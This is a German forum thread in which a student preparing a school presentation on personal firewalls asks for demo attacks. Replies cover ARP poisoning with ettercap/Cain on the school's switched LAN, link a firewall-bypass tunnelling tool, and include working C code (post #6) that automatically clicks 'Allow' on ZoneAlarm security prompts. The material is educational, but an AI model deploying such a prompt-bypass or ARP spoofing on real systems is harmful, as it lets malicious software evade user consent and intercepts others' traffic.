Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
Network · LAN, WAN, Firewalls Alle Fragen rund um das große, kleine Internet finden hier eine Antwort. LANs, WANs, Router, Switches, Bridges, Verkabelung...

Firewall Referat - Meldung erzwingen!

Diskussion: Firewall Referat - Meldung erzwingen! im Forum Network · LAN, WAN, Firewalls, in der Kategorie Web, Network & Multimedia Palace; Anzeige Hi! Ich habe bald ein Referat über Firewalls, worauf ich mich intensiv vorbereite :D Video zum Referat hab ich ...

Antwort
Alt 10.03.08, 10:34   #1 (permalink)
 
Registriert seit: 07.04.06
Huggy Leistung: Facit NTK
Likes: 0
Standard Firewall Referat - Meldung erzwingen!

Anzeige

Hi!

Ich habe bald ein Referat über Firewalls, worauf ich mich intensiv vorbereite :D
Video zum Referat hab ich schon , jetzt hab ich noch die Idee eines "Live Experiments" (The next uri geller *wink*)... Naja es soll eben ein live versuch sein, allerdings ohne erfolg. Ich will also nicht unbedingt in ein System (wir haben mehrere laptops, hätt einen Angreifer (mein pc) und ein Opfer (pc des mit-referenten)).
eindringen, sondern Nur verschiedene Fehlermeldungen von einer Firewall (wir präsentieren ZoneAlarm und Sygate Personal Firewall) hervorrufen.

Dazu wollen wir eben verschiedene Attacken (portscan usw) vom Angreif pc an den Opfer Pc durchführen.

Könnt ihr mir Methoden / vll sogar tools geben, mti denen wir das erreichen?

Mfg

Huggy =)

Huggy ist offline   Mit Zitat antworten
Alt 10.03.08, 10:37   #2 (permalink)
 
Registriert seit: 15.09.06
Banur Leistung: Facit NTK
Likes: 0
Standard

Ich weiß nicht mehr obs bei ZoneAlarm war oder bei einem anderen, aber ich glaub das die Angriffe in einer History eingetragen wurden. Vielleicht könntet ihr die zeigen.
Banur ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 10.03.08, 10:53   #3 (permalink)
Themenstarter
 
Registriert seit: 07.04.06
Huggy Leistung: Facit NTK
Likes: 0
Standard

Ja, sowohl Sygate als auch Zonelarm loggen.. aber wir wollen ja verschiedene Alarm-meldungen zeigen :-)
Huggy ist offline   Mit Zitat antworten
Alt 10.03.08, 12:45   #4 (permalink)
Moderator
 
Benutzerbild von xeno
 
Registriert seit: 09.09.04
xeno Leistung: Pentium Ixeno Leistung: Pentium I
xeno eine Nachricht über ICQ schicken
Likes: 76
Standard

zu dem thema kann ich nur den folgenden vortrag beim ccc empfehlen:
http://www.ulm.ccc.de/ChaosSeminar/2...onal_Firewalls
xeno ist offline   Mit Zitat antworten
Alt 10.03.08, 13:38   #5 (permalink)
Themenstarter
 
Registriert seit: 07.04.06
Huggy Leistung: Facit NTK
Likes: 0
Standard

Super! Sowohl pdf als auch mp4 eigenen sich echt wunderbar

Werd sowieso mehr auf Software als auf Hardwarefirewall eingehen, weil für Brutto Normalverbraucher ohne Router... ihr wisst ja


??: Wir wollen jetzt noch ein Arp-Poisoning durchführen, um eben die Schwachstellen von Firewalls zu zeigen (hab gehört die erkennen das nicht? ).

Jetzt haben wir ind er SChule aber ein auf Switche-basierendes LAN, und ich finde weder mit ettercap noch mit Cain andere Hosts im Netzwerk

Gibts irgendeine Methode, dieses Projekt doch durchzuführen ? Schlimmstenfalls müsst ich von zuhause einen Hub mitbringen, da solllte es doch funktionieren?

ODer geht's auch in einem wie oben beschriebenen Lan? Ich mein anpingen kann ich ja alle :baby:

Mfg


??2: kk hatte vergessen, den promiscius mode auszuschalten -_-
jetzt finde ich so 5-6 hosts, in meinem testnetzwerk sind aaber 15 :/
Und sobald ich mit cain oder ettercap nach hosts scanne, ist mein ganzes Internet weg..dann muss ich rebooten

Und wie finde ich alle hosts?
Huggy ist offline   Mit Zitat antworten
Alt 11.03.08, 17:41   #6 (permalink)
 
Benutzerbild von Eydeet
 
Registriert seit: 14.04.06
Eydeet Leistung: Facit NTK
Likes: 4
Standard

Das mit dem ARP-Poisoning sollte eigentlich funktionieren. Du empfängst keine Daten vom Switch, weil dieser einfach keine Pakete an dich weiterleitet, die nicht für dich bestimmt sind. Durch das ARP-Poisoning erreichst du aber, dass das Opfer seine Pakete an DICH statt an das Ziel schickt.

Übrigens, ich hab mir mal 'nen Spaß daraus gemacht, das AutoKlick-Beispiel für ZoneAlarm umzuschreiben. Das ganze ist POC-Code (die Abfrage blinkt noch kurz auf), aber an sich funktioniert es. Das wäre vielleicht auch 'ne Demonstration wert .
zonealarm-autoklick.c   
Code:
#include <windows.h>

int main()
{
	while (1) {
		// finde das Fenster
		HWND win = FindWindowEx(0, 0, 0, "ZoneAlarm-Sicherheitswarnung");
		if (win == 0 || IsWindowVisible(win) == 0) {
			Sleep(100);
			continue;
		}

		// wähle "Zulassen" aus
		HWND button = FindWindowEx(win, NULL, NULL, "Zu&lassen");
		if (button == 0) {
			MessageBoxEx(NULL, "Kann Zulassen-Button nicht finden!", "ZAAK", MB_OK, 0);
		}


		HWND prevForegroundWindow = GetForegroundWindow();
		SetForegroundWindow(button);
		SendMessage(button, WM_SETFOCUS, 0, 0); 
		keybd_event(VK_SPACE, 0, 0, 0);
		keybd_event(VK_SPACE, 0, KEYEVENTF_KEYUP, 0);
		SetForegroundWindow(prevForegroundWindow);
	}
	return 0;
}
Eydeet ist offline   Mit Zitat antworten
Alt 11.03.08, 18:12   #7 (permalink)
Member of Honour
 
Benutzerbild von xrayn
 
Registriert seit: 05.03.08
xrayn Leistung: Opteronxrayn Leistung: Opteronxrayn Leistung: Opteronxrayn Leistung: Opteronxrayn Leistung: Opteron
Likes: 246
Standard

Ich wuerde an deiner Stelle den Vortag nicht darauf hinauslaufen lassen, dass das Publikum sich am Ende mit PersonalFirewalls sicherer fuehlt. Vielmehr solltest du ihnen beibringen, dass es vor irgendwelches SK schuetzt, aber wenn es jemand wirklich drauf anlegt, ist auch eine pfw kein Hinderniss: https://www.rootkit.com/newsread.php?newsid=849
xrayn ist offline   Mit Zitat antworten
Alt 11.03.08, 18:27   #8 (permalink)
 
Registriert seit: 30.01.08
KlausSchiefer Leistung: Facit NTK
Likes: 0
Standard

Zitat:
Werd sowieso mehr auf Software als auf Hardwarefirewall eingehen, weil für Brutto Normalverbraucher ohne Router... ihr wisst ja
Aber bevor du so vor deiner Klasse argumentierst. Es GIBT keine Hardware Firewalls.
Das sind nichts anderes als kleine "PCs" auf denen ein Betriebssystem mit Packetfilter
läuft. Hardware Firewalls sind ein Hirngespinst von IT Marketingprofis

Nenn sie dann lieber "dedizierte" Firewall Rechner/Computer.

Prinzipiell gibt es keinen Unterschied zwischen einer Netgear Firewall mit IPFilter
und einem Windows 2003 Server mit seiner Firewall.

Zumindest kannst Du mit einer solchen Darstellung noch ein paar "A-ha" Effekte kassieren
KlausSchiefer ist offline   Mit Zitat antworten
Alt 12.03.08, 07:24   #9 (permalink)
Themenstarter
 
Registriert seit: 07.04.06
Huggy Leistung: Facit NTK
Likes: 0
Standard

ja, dass hat sich halt so eingebürgert :/
Blödes marketing


Danke, für das Zonealarm script, sicher auch hilfreich!
Für den "echten" Bösewicht wäre "immer zulassen" oder "Nicht mehr nachfragen" auch praktisch ob man das so zeigen kann weiß ich net, ich glaub ich zeigs einmal so & dreh zuhaus n video davon dass ich dann @zeitlupe abstell.

Der Ziel des Vortrags ist ja, dass man PFW skeptisch gegenüber steht :-)

Noch wer eine Idee, warum ich keine Netzwerkverbindung / IP mehr zugewiesen bekomme sobald ich mit CAIN / Ettercap nach Hosts scanne? (Beide finden aber nur 5-7, im netzwerk sind aber 15+)...

Danke euch so jetzt schau ich mal dass ich das script compiled bekomm, hab ja garkeinen c Compiler mehr
Huggy ist offline   Mit Zitat antworten
Alt 12.03.08, 08:11   #10 (permalink)
Member of Honour
 
Registriert seit: 29.01.05
NeonZero Leistung: Facit NTK
Likes: 0
Standard

Zitat:
Original von Huggy
Der Ziel des Vortrags ist ja, dass man PFW skeptisch gegenüber steht :-)
Schau mal hier: Desktop-Firewall im HaBo-Wiki

Bye, nz
NeonZero ist offline   Mit Zitat antworten
Alt 12.03.08, 08:52   #11 (permalink)
Themenstarter
 
Registriert seit: 07.04.06
Huggy Leistung: Facit NTK
Likes: 0
Standard

Hab ich schon als lesezeichen gehabt, aber danke
Huggy ist offline   Mit Zitat antworten
Alt 12.03.08, 14:18   #12 (permalink)
 
Registriert seit: 30.01.08
KlausSchiefer Leistung: Facit NTK
Likes: 0
Standard

Zitat:
Der Ziel des Vortrags ist ja, dass man PFW skeptisch gegenüber steht :-)
Das Ziel sollte besser sein, das man WEISS warum man der einen oder anderen PFW nicht blind vertrauen sollte
KlausSchiefer ist offline   Mit Zitat antworten
Alt 12.03.08, 15:10   #13 (permalink)
Themenstarter
 
Registriert seit: 07.04.06
Huggy Leistung: Facit NTK
Likes: 0
Standard

Wer skeptisch ist vertraut nicht blind *Hoffnungslos zu argumentieren versuch*

Hat irgendwer eine Idee warum ich @ Arp-Spoofing nicht alle hosts finde & Netzwerkverbindung verliere? Sowohl zuhause im WLAN als auch @ testnetzwerk

??: habe probleme beim compilen des wwwsh clienten, den ich gerne ausführen würde..
Kann mir vll. wer den clienten (Server läuft ) compilen?


http://blog.copton.net/articles/pfw-.../wwwsh.tar.bz2

Hab noch nie mit c(#/++) gearbeitet und wenn ich wie nach anleitung beschrieben den Compiler auf die MAKE file hetze, sagt er "MAKE Ok, nothing to do?" und beendet sich..aber keine .exe :/ hab schon 2 compiler probiert, keiner war das gelbe vom Ei
Huggy ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Web, Network & Multimedia Palace » Network · LAN, WAN, Firewalls » Firewall Referat - Meldung erzwingen!
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Ruhezustand immer erzwingen. Rothkegel Windows 2 22.10.09 18:52
drucken erzwingen? _D4rk_ Windows 0 21.11.06 16:02
Datei-Zugriff erzwingen ? root Windows 12 15.07.06 00:10
Umbruch erzwingen k00ky (Web-) Design und webbasierte Sprachen 2 10.05.06 23:56
RPM deinstall erzwingen the-me Linux/UNIX 6 25.09.05 20:39


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61